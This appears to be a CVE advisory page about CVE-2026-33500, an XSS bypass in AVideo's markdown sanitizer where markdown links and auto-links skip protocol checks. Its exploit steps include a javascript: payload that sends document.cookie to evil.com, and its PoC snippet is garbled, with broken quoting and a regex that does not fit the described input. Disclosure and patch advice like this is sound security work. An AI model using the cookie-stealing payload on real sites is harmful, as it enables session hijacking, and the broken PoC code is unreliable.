Listen to this Post
The CVE-2026-33500 vulnerability arises from an incomplete fix for XSS in AVideo’s `ParsedownSafeWithLinks` class. This class extends the base Parsedown markdown parser and was intended to sanitize raw HTML by overriding `blockMarkup()` (blocks non-<a>/<img> tags) and `inlineMarkup()` (sanitizes `href` and `src` attributes with a whitelist). However, the base `Parsedown.php` contains two additional methods that generate anchor tags: `inlineLink()` (handles markdown `[text](url)` syntax) and `inlineUrlTag()` (handles auto-links like <url>). Because `ParsedownSafeWithLinks` does not override these two methods, any markdown link or auto-link bypasses the sanitization entirely. An attacker can supply a payload such as [Click me](javascript:alert(document.cookie)), which gets passed directly to inlineLink(). That method constructs an HTML anchor: `Click me` without checking the protocol. The same applies to `inlineUrlTag(). The vulnerable code exists in `objects/functionsSecurity.php` (commit pre-3ae02fa24093). The base Parsedown library (vendor/erusev/parsedown/Parsedown.php) implements the unsafe methods. Since the AVideo class only overrides raw HTML handling, the markdown-native link syntax remains unpatched, allowing javascript:, data:, or `vbscript:` URIs to execute arbitrary script in the victim’s browser.
dailycve form:
Platform: AVideo platform
Version: Before commit 3ae02fa
Vulnerability: XSS sanitization bypass
Severity: Critical
date: April 14 2026
Prediction: Patch expected April2026
What Undercode Say:
Clone vulnerable version (commit before fix) git clone https://github.com/WWBN/AVideo /tmp/AVideo_test cd /tmp/AVideo_test && git checkout 3ae02fa240939dbefc5949d64f05790fd25d728d~1 Run PoC script (poc.py) python3 poc.py
poc.py snippet simulating inlineLink bypass
import re
payload = "<a href="javascript:alert(document.cookie)">Click me</a>"
match = re.match(r'[([^]])](([^)]+))', payload)
if match:
text, href = match.group(1), match.group(2)
print(f'<a href="{href}">{text}</a>') unsafe output
how Exploit:
- Find any user input field that uses `ParsedownSafeWithLinks` (comments, video descriptions, channel bio).
- Insert markdown link:
[Hijack](javascript:fetch('https://evil.com/steal?c='+document.cookie)). - Submit content. No sanitization blocks the `javascript:` protocol.
- When another user clicks the link, the JS executes in their session, leaking cookies or performing actions on their behalf.
Protection from this CVE
Override `inlineLink()` and `inlineUrlTag()` in `ParsedownSafeWithLinks` to apply the same protocol whitelist as `inlineMarkup()` (allow only https?://, mailto:, /, “). Reject any javascript:, data:, or `vbscript:` URIs. Update to commit `3ae02fa24093` or later.
Impact
Attacker can inject arbitrary JavaScript via markdown links in any user-generated content. Victims clicking the link suffer session hijacking, account takeover, theft of sensitive data, or unauthorized actions performed in their context.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

